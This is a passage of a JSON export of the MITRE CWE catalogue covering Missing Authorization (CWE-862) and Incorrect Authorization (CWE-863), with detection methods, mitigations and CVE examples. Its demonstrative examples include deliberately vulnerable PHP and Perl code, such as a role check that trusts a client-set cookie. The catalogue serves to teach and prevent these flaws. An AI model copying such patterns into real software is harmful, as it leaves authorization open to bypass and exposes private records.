Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences, Relationships"}]}},"862":{"attr":{"@_ID":"862","@_Name":"Missing Authorization","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not perform an authorization check when an actor attempts to access a resource or perform an action.","Extended_Description":{"xhtml:p":["Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user\'s privileges and any permissions or other access-control specifications that apply to the resource.","When access control checks are not applied, users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}},{"attr":{"@_Name":"Database Server","@_Prevalence":"Often"}}]},"Background_Details":{"Background_Detail":"An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: \\"No access\\", \\"Read access\\", \\"Change access\\", and \\"Full control\\". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object."},"Alternate_Terms":{"Alternate_Term":{"Term":"AuthZ","Description":"\\"AuthZ\\" is typically used as an abbreviation of \\"authorization\\" within the web application security community. It is distinct from \\"AuthN\\" (or, sometimes, \\"AuthC\\") which is an abbreviation of \\"authentication.\\" The use of \\"Auth\\" as an abbreviation is discouraged, since it could be used for either authentication or authorization."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":{"xhtml:p":["OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase.","Authorization weaknesses may arise when a single-user application is ported to a multi-user environment."]}},{"Phase":"Implementation","Note":"A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"An attacker could read sensitive data, either by reading the data directly from a data store that is not restricted, or by accessing insufficiently-protected, privileged functionality to read the data."},{"Scope":"Integrity","Impact":["Modify Application Data","Modify Files or Directories"],"Note":"An attacker could modify sensitive data, either by writing the data directly to a data store that is not restricted, or by accessing insufficiently-protected, privileged functionality to write the data."},{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"],"Note":"An attacker could gain privileges by modifying or reading critical data directly, or by accessing privileged functionality."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-6"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries.","Generally, automated static analysis tools have difficulty detecting custom authorization schemes. In addition, the software\'s design may include some functionality that is accessible to any user and does not require an authorization check; an automated technique that detects the absence of authorization may report false positives."]},"Effectiveness":"Limited"},{"Method":"Automated Dynamic Analysis","Description":"Automated dynamic analysis may find many or all possible interfaces that do not require authorization, but manual analysis is required to determine if the lack of authorization violates business logic."},{"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms."]},"Effectiveness":"Moderate","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints."},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host Application Interface Scanner","Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.","Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role."]}},{"Phase":"Architecture and Design","Description":"Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient\'s doctor [REF-7]."},{"attr":{"@_Mitigation_ID":"MIT-4.4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45]."]}},{"Phase":"Architecture and Design","Description":{"xhtml:p":["For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.","One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page."]}},{"Phase":["System Configuration","Installation"],"Description":"Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a \\"default deny\\" policy when defining these ACLs."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-95"},"Intro_Text":"This function runs an arbitrary SQL query on a given database, returning the result of the query.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function runEmployeeQuery($dbName, $name){}$employeeRecord = runEmployeeQuery(\'EmployeeDB\',$_GET[\'EmployeeName\']);","xhtml:div":{"#text":"mysql_select_db($dbName,$globalDbHandle) or die(\\"Could not open Database\\".$dbName);$preparedStatement = $globalDbHandle->prepare(\'SELECT * FROM employees WHERE name = :name\');$preparedStatement->execute(array(\':name\' => $name));return $preparedStatement->fetchAll();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:i":"//Use a prepared statement to avoid CWE-89"},"xhtml:br":["","",""],"xhtml:i":"/.../"}},"Body_Text":"While this code is careful to avoid SQL Injection, the function does not confirm the user sending the query is authorized to do so. An attacker may be able to obtain sensitive employee information from the database."},{"attr":{"@_Demonstrative_Example_ID":"DX-96"},"Intro_Text":"The following program could be part of a bulletin board system that allows users to send private messages to each other. This program intends to authenticate the user before deciding whether a private message should be displayed. Assume that LookupMessageObject() ensures that the $id argument is numeric, constructs a filename based on that id, and reads the message details from that file. Also assume that the program stores all private messages for all users in the same directory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"sub DisplayPrivateMessage {}my $q = new CGI;if (! AuthenticateUser($q->param(\'username\'), $q->param(\'password\'))) {}my $id = $q->param(\'id\');DisplayPrivateMessage($id);","xhtml:div":[{"#text":"my($id) = @_;my $Message = LookupMessageObject($id);print \\"From: \\" . encodeHTML($Message->{from}) . \\"<br>\\\\n\\";print \\"Subject: \\" . encodeHTML($Message->{subject}) . \\"\\\\n\\";print \\"<hr>\\\\n\\";print \\"Body: \\" . encodeHTML($Message->{body}) . \\"\\\\n\\";","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"#text":"ExitError(\\"invalid username or password\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","","","","","","","","",""],"xhtml:i":["# For purposes of this example, assume that CWE-309 and","# CWE-523 do not apply."]}},"Body_Text":["While the program properly exits if authentication fails, it does not ensure that the message is addressed to the user. As a result, an authenticated attacker could provide any arbitrary identifier and read private messages that were intended for other users.","One way to avoid this problem would be to ensure that the \\"to\\" field in the message object matches the username of the authenticated user."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-3168","Description":"Web application does not restrict access to admin scripts, allowing authenticated users to reset administrative passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3168"},{"Reference":"CVE-2009-3597","Description":"Web application stores database file under the web root with insufficient access control (CWE-219), allowing direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3597"},{"Reference":"CVE-2009-2282","Description":"Terminal server does not check authorization for guest access.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2282"},{"Reference":"CVE-2008-5027","Description":"System monitoring software allows users to bypass authorization by creating custom forms.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5027"},{"Reference":"CVE-2009-3781","Description":"Content management system does not check access permissions for private files, allowing others to view those files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3781"},{"Reference":"CVE-2008-6548","Description":"Product does not check the ACL of a page accessed using an \\"include\\" directive, allowing attackers to read unauthorized files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6548"},{"Reference":"CVE-2009-2960","Description":"Web application does not restrict access to admin scripts, allowing authenticated users to modify passwords of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2960"},{"Reference":"CVE-2009-3230","Description":"Database server does not use appropriate privileges for certain sensitive operations.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3230"},{"Reference":"CVE-2009-2213","Description":"Gateway uses default \\"Allow\\" configuration for its authorization settings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2213"},{"Reference":"CVE-2009-0034","Description":"Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0034"},{"Reference":"CVE-2008-6123","Description":"Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6123"},{"Reference":"CVE-2008-7109","Description":"Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7109"},{"Reference":"CVE-2008-3424","Description":"Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3424"},{"Reference":"CVE-2005-1036","Description":"Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1036"},{"Reference":"CVE-2008-4577","Description":"ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4577"},{"Reference":"CVE-2007-2925","Description":"Default ACL list for a DNS server does not set certain ACLs, allowing unauthorized DNS queries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2925"},{"Reference":"CVE-2006-6679","Description":"Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6679"},{"Reference":"CVE-2005-3623","Description":"OS kernel does not check for a certain privilege before setting ACLs for files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3623"},{"Reference":"CVE-2005-2801","Description":"Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2801"},{"Reference":"CVE-2001-1155","Description":"Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155"},{"Reference":"CVE-2020-17533","Description":"Chain: unchecked return value (CWE-252) of some functions for policy enforcement leads to authorization bypass (CWE-862)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17533"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"665"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-229"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 4, "Authorization" Page 114; Chapter 6, "Determining Appropriate Access Control" Page 171"}},{"attr":{"@_External_Reference_ID":"REF-231"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-233"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, "Common Vulnerabilities of Authorization", Page 39"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-05-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"}]}},"863":{"attr":{"@_ID":"863","@_Name":"Incorrect Authorization","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. This allows attackers to bypass intended access restrictions.","Extended_Description":{"xhtml:p":["Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user\'s privileges and any permissions or other access-control specifications that apply to the resource.","When access control checks are incorrectly applied, users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}},{"attr":{"@_Name":"Database Server","@_Prevalence":"Often"}}]},"Background_Details":{"Background_Detail":"An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: \\"No access\\", \\"Read access\\", \\"Change access\\", and \\"Full control\\". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object."},"Alternate_Terms":{"Alternate_Term":{"Term":"AuthZ","Description":"\\"AuthZ\\" is typically used as an abbreviation of \\"authorization\\" within the web application security community. It is distinct from \\"AuthN\\" (or, sometimes, \\"AuthC\\") which is an abbreviation of \\"authentication.\\" The use of \\"Auth\\" as an abbreviation is discouraged, since it could be used for either authentication or authorization."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Authorization weaknesses may arise when a single-user application is ported to a multi-user environment."},{"Phase":"Implementation","Note":{"xhtml:p":["REALIZATION: This weakness is caused during implementation of an architectural security tactic.","A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies."]}},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"An attacker could read sensitive data, either by reading the data directly from a data store that is not correctly restricted, or by accessing insufficiently-protected, privileged functionality to read the data."},{"Scope":"Integrity","Impact":["Modify Application Data","Modify Files or Directories"],"Note":"An attacker could modify sensitive data, either by writing the data directly to a data store that is not correctly restricted, or by accessing insufficiently-protected, privileged functionality to write the data."},{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"],"Note":"An attacker could gain privileges by modifying or reading critical data directly, or by accessing privileged functionality."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-6"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries.","Generally, automated static analysis tools have difficulty detecting custom authorization schemes. Even if they can be customized to recognize these schemes, they might not be able to tell whether the scheme correctly performs the authorization in a way that cannot be bypassed or subverted by an attacker."]},"Effectiveness":"Limited"},{"Method":"Automated Dynamic Analysis","Description":"Automated dynamic analysis may not be able to find interfaces that are protected by authorization checks, even if those checks contain weaknesses."},{"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms."]},"Effectiveness":"Moderate","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints."},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host Application Interface Scanner","Fuzz Tester","Framework-based Fuzzer","Forced Path Execution","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.","Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role."]}},{"Phase":"Architecture and Design","Description":"Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient\'s doctor [REF-7]."},{"attr":{"@_Mitigation_ID":"MIT-4.4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45]."]}},{"Phase":"Architecture and Design","Description":{"xhtml:p":["For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.","One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page."]}},{"Phase":["System Configuration","Installation"],"Description":"Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a \\"default deny\\" policy when defining these ACLs."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code could be for a medical records application. It displays a record to already authenticated users, confirming the user\'s authorization using a value stored in a cookie.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$role = $_COOKIES[\'role\'];if (!$role) {}if ($role == \'Reader\') {}else{}","xhtml:br":["","",""],"xhtml:div":[{"#text":"$role = getRole(\'user\');if ($role) {}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":[{"#text":"// save the cookie to send out in future responsessetcookie(\\"role\\", $role, time()+60*60*2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"ShowLoginScreen();die(\\"\\\\n\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]},{"#text":"DisplayMedicalHistory($_POST[\'patient_ID\']);","attr":{"@_style":"margin-left:10px;"}},{"#text":"die(\\"You are not Authorized to view this record\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"The programmer expects that the cookie will only be set when getRole() succeeds. The programmer even diligently specifies a 2-hour expiration for the cookie. However, the attacker can easily set the \\"role\\" cookie to the value \\"Reader\\". As a result, the $role variable is \\"Reader\\", and getRole() is never invoked. The attacker has bypassed the authorization system."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-15900","Description":"Chain: sscanf() call is used to check if a username and group exists, but the return value of sscanf() call is not checked (CWE-252), causing an uninitialized variable to be checked (CWE-457), returning success to allow authorization bypass for executing a privileged (CWE-863).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15900"},{"Reference":"CVE-2009-2213","Description":"Gateway uses default \\"Allow\\" configuration for its authorization settings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2213"},{"Reference":"CVE-2009-0034","Description":"Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0034"},{"Reference":"CVE-2008-6123","Description":"Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6123"},{"Reference":"CVE-2008-7109","Description":"Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7109"},{"Reference":"CVE-2008-3424","Description":"Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3424"},{"Reference":"CVE-2008-4577","Description":"ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4577"},{"Reference":"CVE-2006-6679","Description":"Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6679"},{"Reference":"CVE-2005-2801","Description":"Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2801"},{"Reference":"CVE-2001-1155","Description":"Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access 